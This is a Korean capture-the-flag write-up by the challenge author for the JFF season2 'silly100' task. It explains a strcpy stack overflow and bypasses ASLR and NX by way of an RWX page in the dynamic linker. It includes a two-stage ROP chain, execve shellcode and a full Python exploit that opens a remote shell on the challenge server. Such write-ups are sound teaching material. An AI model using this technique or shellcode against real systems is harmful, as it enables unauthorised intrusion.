┏━━━━━━━━━━━━━━━━━━━━━┓
┃ ┏━━━━┓ ┏━━━━┓ ┏━━━━┓   ┃
┃ ┗━┓┏━┛ ┃┏━━━┛ ┃┏━━━┛   ┃
┃     ┃┃     ┃┗━━┓   ┃┗━━┓     ┃
┃ ┏┓┃┃     ┃┏━━┛   ┃┏━━┛     ┃
┃ ┃┗┛┃     ┃┃         ┃┃           ┃
┃ ┗━━┛     ┗┛         ┗┛           ┃
┣━━━━━━━━━━━━━━━━━━━━━┫
┃ ┏━━┳━━┳━━┳━━┳━━┳━┳┓   ┃
┃ ┃  ━┫  ━┫┏┓┃  ━┫┏┓┃  ┃┃   ┃
┃ ┣━  ┃  ━┫┣┫┣━  ┃┗┛┃┃  ┃   ┃
┃ ┗━━┻━━┻━━┻━━┻━━┻┻━┛2  ┃
┗━━━━━━━━━━━━━━━━━━━━━┛

━[Document Infomation] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 :: Title  :: Just For Fun Season2 / silly100 write-up
 :: Date   :: 2012. 08. 01
 :: Author :: pwn3r
 :: Editor :: pwn3r
 :: Contact:: E-Mail(austinkwon2@gmail.com)
              Homepage(http://pwn3r.tistory.com)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

━[Index] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 
0x00. Intro
0x01. Analysis
0x02. Vulnerability
0x03. How To Exploit?
0x04. There's already RWX permission memory?
0x05. Powerful Exploitation
0x06. Conclusion

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


━[0x00. Intro] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

2008년 beistlab이 개최하셨던 Just For Fun 해킹대회의 season2를 올해 B10S와 WiseGuyz에서 
개최했습니다. 이번 JFF season2에 제가 출제했던 silly100문제의 풀이입니다.
문제의 이름처럼 문제의 소스는 silly하게 작성되었습니다.
애초에 컨셉이 소스와 취약점은 모두 매우 간단하지만 , Exploitation이 어려운 문제입니다.
따라서 풀이에선 취약점을 자세히 설명하기보단 , Exploitation 기술에 비중을 두고 설명합니다.
편의상 경어체는 생략하겠습니다.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━



━[0x01. Analysis] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

-----------------------------------------------
| Challenge Info                              |
-----------------------------------------------
|read /home/silly100/flag.txt :p              |
|                                             |
|ADDR : challenge.b10s.org                    |
|PORT : 13301                                 |
|                                             |
|binary : http://jff.b10s.org/files/silly100  |
|                                             |
|* ASLR & NX are enabled on challenge server  |
|                                             |
|* Server OS : Ubuntu 10.04                   |
-----------------------------------------------

서버주소,포트와 함께 linux ELF executable 바이너리가 주어졌다.
바이너리는 주어진 서버주소에서 xinetd 서비스로서 작동하고 있었다.
IDA의 hex-ray기능을 이용해 디컴파일해 분석해보자.

---------------------------------------
|int __cdecl main()                   |
|{                                    |
|  char v1; // [sp+10h] [bp-10h]@1    |
|                                     |
|  chdir("/home/silly100/");          |
|  puts("Smash Me :p");               |
|  fflush(stdout);                    |
|  fgets(buffer, 1024, stdin);        |
|  strcpy(&v1, buffer);               |
|  return 0;                          |
|}                                    |
---------------------------------------

취약점이 간빼놓고 기다리고 있다. 대놓고 전형적인 Stack Overflow 취약점의 문제이다. 
fgets함수로 1024 bytes 만큼의 데이터를 전역변수에 입력받고 이를 strcpy함수로
길이 제한없이 0x10 bytes 짜리 지역변수에 복사시키기 때문에 취약점이 발생한다.
취약점에 대해 더 길게 설명하고 싶지만 이 프로그램의 취약점을 3줄이상으로 늘리는건
억지인것 같아 여기서 적당히 그만둔다 :)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


━[0x02. Vulnerability] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

아 일부로 취약점 정리페이지 따로 만들었는데 앞에서 다해서 할게없다..

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


━[0x03. How To Exploit?] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

취약점은 아주 쉽게 찾을 수 있지만 아무래도 Remote 환경인데다가 서버의 OS는 Ubuntu 10.04이고 
ASLR과 NX가 모두 걸려있는 상황이기 때문에 내가 낸 문제이지만 나도 빡친다.

평소에 Ubuntu에서 exploitation작업을 몇번 해보신 분들이라면 중복되어서 출현하는 주소가 
많음을 알고 , 이를 이용해 공유라이브러리 함수주소를 하나잡고 Brute Force를 할 것이다.

실제로 대회가 진행되는 동안에도 문제서버 OS의 실제 환경이 공개되기 전까지 아무도 풀이하지 
못했고 , 문제서버 OS환경이 공개되고나서야 같은 버젼의 Ubuntu를 다운받아 공유라이브러리 
파일에서 실행계열 함수주소를 알아내 , Brute Force하여 쉘을 따냇다.

또 다른 방법은 , 서버와 동일한 공유라이브러리 파일을 찾아 system함수같은 실행계열함수주소와 
puts함수주소의 offset을 구해 puts함수의 GOT에 더하고 그곳으로 점프하는 방법이 있을 것이다.

물론 이 방법들도 충분히 멋진 방법이지만 이것은 공유라이브러리 파일에 의존적이다. 
같은 공유라이브러리 파일이 없다면 이런 공격을 하는 것은 매우 힘들다. 
따라서 높은 확률의 성공률과 원샷을 위해 사용하기엔 무리가 있다.

passket멘토님으로부터 수업시간마다 "해커의 생명은 간지다"라고 배운 나는 더욱 간지나고 
reliable하게 ASLR과 NX를 우회하여 원샷으로 PWN이 가능한 Exploitation기술을 소개하겠다.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


━[0x04. There's already RWX permission memory?] ━━━━━━━━━━━━━━━━━━

뒤에서 소개할 Payload에 대한 이해를 위해 잠시 다른 내용으로 빠지겠다.

일반적으로 리눅스의 버젼이 점점 높아져 갈수록 RWX권한을 가진 메모리는 점점 줄어들어 갔고,
최신버젼 리눅스의 바이너리에선 RWX메모리를 찾아볼 수 없게 되었다.

라고 대부분의 사람들은 생각한다.
하지만 그게 정말일까?

대답은 당연히 NO , 다 구라다.
그렇다면 그렇게 생각하게된 근거는 무엇일까?
한번 silly100문제의 문제서버 OS인 Ubuntu 10.04에서 -o 옵션으로 단순히 컴파일된 바이너리의 
메모리 맵을 보도록하자.

--------------------------------------------------------------------------------------
|(gdb) she cat /proc/2166/maps                                                       |
|00110000-0012b000 r-xp 00000000 08:01 264465     /lib/ld-2.11.1.so                  |
|0012b000-0012c000 r--p 0001a000 08:01 264465     /lib/ld-2.11.1.so                  |
|0012c000-0012d000 rw-p 0001b000 08:01 264465     /lib/ld-2.11.1.so                  |
|0012d000-0012e000 r-xp 00000000 00:00 0          [vdso]                             |
|0012e000-00281000 r-xp 00000000 08:01 395061     /lib/tls/i686/cmov/libc-2.11.1.so  |
|00281000-00282000 ---p 00153000 08:01 395061     /lib/tls/i686/cmov/libc-2.11.1.so  |
|00282000-00284000 r--p 00153000 08:01 395061     /lib/tls/i686/cmov/libc-2.11.1.so  |
|00284000-00285000 rw-p 00155000 08:01 395061     /lib/tls/i686/cmov/libc-2.11.1.so  |
|00285000-00288000 rw-p 00000000 00:00 0                                             |
|08048000-08049000 r-xp 00000000 08:01 1061675    /home/pwn3r/test                   |
|08049000-0804a000 r--p 00000000 08:01 1061675    /home/pwn3r/test                   |
|0804a000-0804b000 rw-p 00001000 08:01 1061675    /home/pwn3r/test                   |
|b7fef000-b7ff0000 rw-p 00000000 00:00 0                                             |
|b7ffe000-b8000000 rw-p 00000000 00:00 0                                             |
|bffeb000-c0000000 rw-p 00000000 00:00 0          [stack]                            |
--------------------------------------------------------------------------------------

위에 나오는 것처럼 RWX 메모리는 보이지 않는다.
메모리 맵파일에는 표시되어 있지않지만 , 아래부분이 바로 RWX 권한을 가진 메모리이다.

--------------------------------------------------------------------------------------
|0012c000-0012d000 rw-p 0001b000 08:01 264465     /lib/ld-2.11.1.so                  |
--------------------------------------------------------------------------------------

실제로는 저 영역에 x권한이 주어졌지만 , maps파일에 업데이트가 되지않아 표시되지 않는
것이라고 한다. (* 모든 리눅스에서 이 영역에 RWX 권한이 있는것은 아니다.)
이 내용은 passket님에 의해 발견되어 POC2011에서 발표되었다. 내 설명이 구리다면 아래
URL에 가서 읽어보길 바란다.
(* 관련 포스팅 : http://passket.tistory.com/33)

아무튼 다짜고짜 이곳이 RWX memory라고만 써놓으면 어떻게하란 것인가.
한번 gdb로 증명해보자.

우선 gdb에서 프로그램을 실행한 후 , 메모리 맵을 읽어 RWX memory의 범위를 알아낸다.
그리고 해당 RWX memory의 범위내에서 임의의 주소에 NOP명령을 집어넣고 EIP를 NOP명령이 있는 
주소로 바꾸어 정상적으로 NOP명령이 실행되는지 확인해 보도록한다.

--------------------------------------------------------------------------------------
|(gdb) set *(0x0012c000) = 0x90909090                                                |
|(gdb) set $eip = 0x0012c000                                                         |
|(gdb) x/i $eip                                                                      |
|=> 0x12c000:	nop                                                                  |
|(gdb) ni                                                                            |
|0x0012c001 in ?? () from /lib/ld-linux.so.2                                         |
|(gdb) ni                                                                            |
|0x0012c002 in ?? () from /lib/ld-linux.so.2                                         |
--------------------------------------------------------------------------------------

성공적으로 실행되는 것이 확인되었다 :)
(원래 gdb에선 실행권한이 없는 영역에서 명령을 실행하려하면 에러를 출력하고 진행되지않는다.)

이 RWX memory를 이용하면 mprotect나 mmap함수등을 부르지않고도 바로 shellcode를 실행시킬수
있다.

그런데 RWX memory가 이미 메모리 상에 존재한다는 것은 확인되었지만 , 이걸 공격에 바로
적용시키기엔 문제가 있다. RWX memory 영역에 해당하는 자리는 다이나믹 링커 중 일부분이기
때문에 ASLR 적용 범위에 포함이 된다. 이 메모리 주소마저 알아낼 수 없다면 여태껏 설명한
내용들이 모두 필요없게되겠지만 , 다행히도 GOT + 4에서 이 RWX memory 범위에 포함된 주소를
가르키고 있다.

따라서 우리는 GOT+4 저장되어있는 주소를 leak하거나 다른 페이로드에 복사시켜 , 최종적으론
RWX memory에 쉘코드를 입력받도록하고 RWX memory로 점프해버리면 곧바로 쉘코드를 
실행시켜버릴 수 있다.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


━[0x05. Powerful Exploitation] ━━━━━━━━━━━━━━━━━━━━━━━━━━━

그럼 이제 Exploit작성을 위해 payload를 구성해보자.

우선 , payload의 최종 목표는 "RWX memory"에 쉘코드를 입력받도록 하고 , 그곳으로 점프하는
것이다. 

마침 fgets나 strcpy같은 공유라이브러리 함수들을 사용하기 때문에 , 해당함수의 PLT를
이용할 수 있어 편리하다.

안그래도 payload를 넣을 수 있는 공간이 1024 bytes이기 때문에 Exploit하기 편한데
입력받는 버퍼가 전역변수이기까지해서 고정주소에 원하는 payload를 엄청난 사이즈만큼 
넣어줄 수 있게된것이다.

정리하자면 , payload 구성할 때 우리가 최대한 이용해야 할 것들은 아래와같다.

1) 입력함수 : fgets@plt
2) 복사함수 : strcpy@plt
3) 전역변수 (고정주소를 가짐)
4) RWX memory

Payload는 크게 2개의 stage로 나눌 수 있다.

두 번째 stage(STAGE_1)는 fgets함수를 이용해 RWX memory에 데이터를 입력받도록 하는 payload
이고 , 첫 번째 stage(STAGE_0)는 두 번째 stage(STAGE_1)에 RWX memory주소를 구해오기 위한 payload이다.

또 한가지 고려해야 할점은 fgets 함수로 표준입력을 받기위해서 사용할 STDIN 파일포인터가
랜덤하기때문이다. 
그래서 STAGE_0에서 RWX memory를 구해오는 것뿐만아니라 STDIN 파일포인터도 구해와야한다.

그런데 어떻게 STAGE_0에서 어떻게 두 주소를 STAGE_1에 구해올 것인가?

strcpy@plt를 이용해 RWX memory를 가르키는 포인터(&GOT + 4)를 인자로 하여 전역변수에 있는
RWX memory 주소를 고정된 주소에 있는 STAGE_1 payload에 복사해올 수 있다. 
STDIN 파일포인터도 메모리상에 STDIN파일포인터를 포인팅하는 포인터가 존재하기 때문에
strcpy@plt로 고정된 주소에 있는 STAGE_1 payload에 복사시켜줌으로써 STAGE_1 payload의 fgets함수
인자구성을 완료시켜줄 수 있다.

결국 최종 payload는 아래와 같다.

----------------------------------------------------------------------------
|STAGE_0                                                                   |
|                                                                          |	
|[strcpy@plt] [&(pop;pop;ret)] [&STAGE_1+8] [&GOT+4]                       |
|[strcpy@plt] [&(pop;pop;ret)] [&STAGE_1+16] [&STDIN]                      |
|[&(pop ebp;ret)] [&STAGE_1-4] [&(leave;ret)]                              |
|                                                                          |
|STAGE_1                                                                   |
|                                                                          |
|[fgets@plt] [&ret] [0xdeadbeef] [len(SHELLCODE)] [0xdeadbeef]             |
----------------------------------------------------------------------------

STAGE 0 payload에서 strcpy함수들이 수행되고 나면 strcpy에 의해 필요한 주소들이 STAGE_1 payload로
복사되면서 STAGE_1 payload는 아래와 같이 변경될 것이다.

----------------------------------------------------------------------------
|[fgets@plt] [&ret] [&RWX_memory] [len(SHELLCODE)] [STDIN]                 |
----------------------------------------------------------------------------

STAGE_0 payload에서 strcpy함수들이 수행되어 STAGE_1 payload가 위와 같이 변경된 뒤
leave; ret명령을 이용해 스택프레임을 STAGE_1 payload가 있는 주소로 옮겨간다.
스택프레임이 이동되어 fgets함수로 RWX memory에 입력을 기다릴때 , 쉘코드를 전송해주면
RWX memory에 쉘코드를 입력받고 , ret명령이 있는 주소로 리턴하기때문에 최종적으로
RWX memory로 RET하게 되는것이다.

그럼 이제 이론은 성립됬으니 실제로 Exploit해보자.
아래는 최종 Exploit이다.

==================================================================================
#!/usr/bin/python

from socket import *
from struct import pack

HOST = "challenge.b10s.org"
PORT = 13301

base_addr = 0x0804A080	# &(global variable "buffer")

strcpy_plt = 0x08048420	# strcpy@plt
fgets_plt = 0x080483F0	# fgets@plt
stdin_ptr = 0x0804A040	# &STDIN_PTR
rwx_ptr = 0x08049ff8	# &GOT + 4

ppr = 0x080484D2	# &(pop ebx; pop ebp; ret)
leave_ret = 0x080483CE	# &(leave; ret)

p = lambda x :pack("<L" , x)

SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
# 25 bytes - execve("/bin/sh" , {"sh",0} , 0);

stage_0 = ""
stage_1 = ""

stage_0 += "a"*28
stage_0 += p(strcpy_plt)			# strcpy(&STAGE_1 + 16 , &STDIN_PTR)
stage_0 += p(ppr)
stage_0 += p(base_addr + 28 + 11*4 + 16)	# 28 = len(stack buffer + sfp) , 11*4 = len(stage_0)
stage_0 += p(stdin_ptr)

stage_0 += p(strcpy_plt)			# strcpy(&STAGE_1 + 8 , &GOT + 4)
stage_0 += p(ppr)
stage_0 += p(base_addr + 28 + 11*4 + 8)		# 28 = len(stack buffer + sfp) , 11*4 = len(stage_0)
stage_0 += p(rwx_ptr)

stage_0 += p(ppr + 1)
stage_0 += p(base_addr + 28 + 11*4 - 4)
stage_0 += p(leave_ret)

stage_1 += p(fgets_plt)
stage_1 += p(ppr + 2)
stage_1 += p(0xdeadbeef)
stage_1 += p(len(SHELLCODE)+1)
stage_1 += p(0xdeadbeef)

payload = stage_0 + stage_1

s = socket(AF_INET , SOCK_STREAM)
s.connect((HOST , PORT))
s.recv(1024)
s.send(payload+"\x90"*(0x400-len(payload)-1)+SHELLCODE+"\n")

while 1:
	cmd = raw_input("$ ")
	s.send(cmd + "\n")
	if cmd == "exit":
		break
	print s.recv(1024)

s.close()
==================================================================================

이건 내가 짯지만 정말 간지나는거 같다.
위에서 구성했던 payload의 실제 값을 찾아 대입시키고 , payload를 서버에 전송하고 쉘코드를
한 번더 전송해준다.(위 코드에선 그냥 payload랑 shellcode 한번에 다 보내줬다)
exploit을 실행해보자.

--------------------------------------------------------------------------------------
|[pwn3r@localhost silly100]$ ./exploit.py                                            |
|$ id                                                                                |
|uid=1005(silly100) gid=1005(silly100)                                               |
|                                                                                    |
|$ cat flag.txt                                                                      |
|rhkwpvhrxksdlekvjdvjdvjdzhkd                                                        |
--------------------------------------------------------------------------------------

겁나 깔끔하다 :)
쉘코드가 실행되어 전송해준 명령을 정상적으로 실행하고 , 결과를 보내준다.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


━[0x06. Conclusion] ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

나름 준비를 열심히 했던 대회인데 예상외의 운영Miss가 많이 있는것 같아 아쉽고 죄송하네요 :p
그래도 이번 JFF season2 재밌게 즐겨주신분들께 감사드리고 수고많으셨습니다 :)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━